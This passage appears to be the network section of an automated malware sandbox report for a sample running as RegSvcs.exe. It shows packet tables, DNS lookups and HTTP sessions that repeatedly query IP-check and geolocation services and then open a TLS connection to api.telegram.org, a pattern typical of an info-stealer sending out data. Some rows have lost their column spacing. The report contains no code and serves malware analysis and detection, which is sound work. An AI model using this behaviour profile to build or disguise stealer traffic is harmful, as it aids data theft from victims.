Jan 10, 2025 23:44:28.667089939 CET  443          49757      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.669141054 CET  49757        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.669169903 CET  443          49757      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.800971985 CET  443          49757      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.801059961 CET  443          49757      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:28.801423073 CET  49757        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.801757097 CET  49757        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:28.805480957 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:28.806817055 CET  49758        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:28.810672045 CET  80           49755      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:28.811594009 CET  80           49758      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:28.811707973 CET  49755        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:28.811867952 CET  49758        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:28.812019110 CET  49758        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:28.816884041 CET  80           49758      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:29.374680996 CET  80           49758      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:29.376564026 CET  49759        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:29.376617908 CET  443          49759      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:29.376770020 CET  49759        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:29.376992941 CET  49759        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:29.377008915 CET  443          49759      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:29.427855015 CET  49758        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:29.840090036 CET  443          49759      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:29.841737032 CET  49759        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:29.841761112 CET  443          49759      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:29.967255116 CET  443          49759      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:29.967334986 CET  443          49759      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:29.967395067 CET  49759        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:29.967813015 CET  49759        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:29.972040892 CET  49758        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:29.972887039 CET  49760        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:29.977087975 CET  80           49758      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:29.977184057 CET  49758        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:29.977741003 CET  80           49760      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:29.977833033 CET  49760        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:29.977925062 CET  49760        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:29.982706070 CET  80           49760      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:30.545660019 CET  80           49760      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:30.553968906 CET  49761        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:30.554047108 CET  443          49761      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:30.554131985 CET  49761        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:30.554538012 CET  49761        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:30.554555893 CET  443          49761      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:30.599431038 CET  49760        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:31.019331932 CET  443          49761      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:31.021147966 CET  49761        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:31.021179914 CET  443          49761      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:31.182272911 CET  443          49761      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:31.182342052 CET  443          49761      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:31.182461023 CET  49761        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:31.182971001 CET  49761        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:31.186671019 CET  49760        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:31.188093901 CET  49762        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:31.191685915 CET  80           49760      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:31.191893101 CET  49760        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:31.192926884 CET  80           49762      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:31.193099976 CET  49762        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:31.193432093 CET  49762        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:31.198195934 CET  80           49762      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:31.771938086 CET  80           49762      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:31.773641109 CET  49763        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:31.773753881 CET  443          49763      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:31.773884058 CET  49763        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:31.774169922 CET  49763        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:31.774200916 CET  443          49763      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:31.818322897 CET  49762        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:32.369301081 CET  443          49763      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:32.371201992 CET  49763        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:32.371246099 CET  443          49763      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:32.498596907 CET  443          49763      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:32.498677969 CET  443          49763      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:32.498734951 CET  49763        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:32.499206066 CET  49763        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:32.503484964 CET  49764        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:32.508383036 CET  80           49764      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:32.508456945 CET  49764        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:32.508610010 CET  49764        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:32.513521910 CET  80           49764      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:33.083934069 CET  80           49764      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:33.085313082 CET  49765        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:33.085365057 CET  443          49765      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:33.085443020 CET  49765        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:33.085725069 CET  49765        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:33.085741997 CET  443          49765      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:33.130700111 CET  49764        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:33.542584896 CET  443          49765      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:33.549705982 CET  49765        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:33.549745083 CET  443          49765      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:33.684423923 CET  443          49765      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:33.684500933 CET  443          49765      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:33.684561014 CET  49765        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:33.685247898 CET  49765        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:33.698628902 CET  49764        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:33.699664116 CET  49766        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:33.703664064 CET  80           49764      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:33.703749895 CET  49764        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:33.704488993 CET  80           49766      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:33.704600096 CET  49766        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:33.704691887 CET  49766        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:33.709461927 CET  80           49766      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:34.296876907 CET  80           49766      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:34.299140930 CET  49767        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:34.299211025 CET  443          49767      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:34.299489021 CET  49767        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:34.299784899 CET  49767        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:34.299799919 CET  443          49767      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:34.349558115 CET  49766        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:34.771974087 CET  443          49767      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:34.773550034 CET  49767        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:34.773586988 CET  443          49767      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:34.928774118 CET  443          49767      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:34.928837061 CET  443          49767      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:34.928915977 CET  49767        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:34.929527044 CET  49767        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:34.933187008 CET  49766        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:34.934082031 CET  49768        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:34.938071012 CET  80           49766      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:34.938137054 CET  49766        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:34.938833952 CET  80           49768      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:34.938908100 CET  49768        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:34.939143896 CET  49768        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:34.943873882 CET  80           49768      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:35.528271914 CET  80           49768      158.101.44.242   192.168.2.4
Jan 10, 2025 23:44:35.529959917 CET  49769        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:35.530018091 CET  443          49769      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:35.530119896 CET  49769        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:35.530410051 CET  49769        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:35.530421972 CET  443          49769      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:35.583872080 CET  49768        80         192.168.2.4      158.101.44.242
Jan 10, 2025 23:44:35.994404078 CET  443          49769      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:35.996033907 CET  49769        443        192.168.2.4      104.21.16.1
Jan 10, 2025 23:44:35.996069908 CET  443          49769      104.21.16.1      192.168.2.4
Jan 10, 2025 23:44:36.141884089 CET  443          49769      104.21.16.1      192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.141956091 CET44349769104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.142194986 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.142648935 CET49769443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.145781994 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.147000074 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.151341915 CET8049768158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.151407003 CET4976880192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.152534962 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.152606010 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.152740955 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:36.158070087 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.770400047 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.771795034 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.771904945 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.772016048 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.772294044 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:36.772325039 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:36.818279982 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:37.249052048 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.250844955 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:37.250890970 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.376630068 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.376708984 CET44349771104.21.16.1192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.376873016 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:37.377383947 CET49771443192.168.2.4104.21.16.1
                                                                                                                          Jan 10, 2025 23:44:37.386955976 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:37.387746096 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:37.387797117 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.387895107 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:37.388389111 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:37.388403893 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.392863035 CET8049770158.101.44.242192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:37.392930984 CET4977080192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:38.004987001 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.005176067 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.006848097 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.006860018 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.007822990 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.009490967 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.051332951 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.256285906 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.256375074 CET44349772149.154.167.220192.168.2.4
                                                                                                                          Jan 10, 2025 23:44:38.256438017 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.258487940 CET49772443192.168.2.4149.154.167.220
                                                                                                                          Jan 10, 2025 23:44:38.819343090 CET4973680192.168.2.4158.101.44.242
                                                                                                                          Jan 10, 2025 23:44:54.258106947 CET4976280192.168.2.4158.101.44.242
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 23:44:10.970925093 CET | 63232 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 23:44:10.977775097 CET | 53 | 63232 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 23:44:11.831013918 CET | 53167 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 23:44:11.838495016 CET | 53 | 53167 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 23:44:21.881253958 CET | 50665 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 23:44:21.888406992 CET | 53 | 50665 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 23:44:10.970925093 CET | 192.168.2.4 | 1.1.1.1 | 0xf3ba | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.831013918 CET | 192.168.2.4 | 1.1.1.1 | 0xd0cd | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:21.881253958 CET | 192.168.2.4 | 1.1.1.1 | 0xeba1 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 23:44:10.977775097 CET | 1.1.1.1 | 192.168.2.4 | 0xf3ba | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 23:44:10.977775097 CET | 1.1.1.1 | 192.168.2.4 | 0xf3ba | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:10.977775097 CET | 1.1.1.1 | 192.168.2.4 | 0xf3ba | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:10.977775097 CET | 1.1.1.1 | 192.168.2.4 | 0xf3ba | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:10.977775097 CET | 1.1.1.1 | 192.168.2.4 | 0xf3ba | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:10.977775097 CET | 1.1.1.1 | 192.168.2.4 | 0xf3ba | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:11.838495016 CET | 1.1.1.1 | 192.168.2.4 | 0xd0cd | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 23:44:21.888406992 CET | 1.1.1.1 | 192.168.2.4 | 0xeba1 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:10.988344908 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:11.597074986 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7546aeea9470fa3bc21683d86c9fc2e6
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:44:11.612184048 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:11.780548096 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 823fc36e588a20a1ef0e81acebf0422e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 23:44:12.527944088 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:12.688503027 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:12 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d2d20aba1b567bbc7620dc97522ad1b4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:13.324970007 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:13.918745041 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:13 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 51372278734c7b0192063acc0a6b8b58
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49736 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:14.547512054 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 10, 2025 23:44:15.134408951 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:15 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 42e36cd884095d324571ed8992357a26
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49738 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:15.782411098 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:16.351823092 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 08466d5f6f18fc15fa8a44c1df493ac0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:16.975142956 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 10, 2025 23:44:17.535942078 CET | 321 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 22:44:17 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4e7c0fd8cf927ff34dedc59a49d66c84
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49743 | 158.101.44.242 | 80 | 7508 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 23:44:18.225591898 CET | 151 | OUT | GET / HTTP/1.1
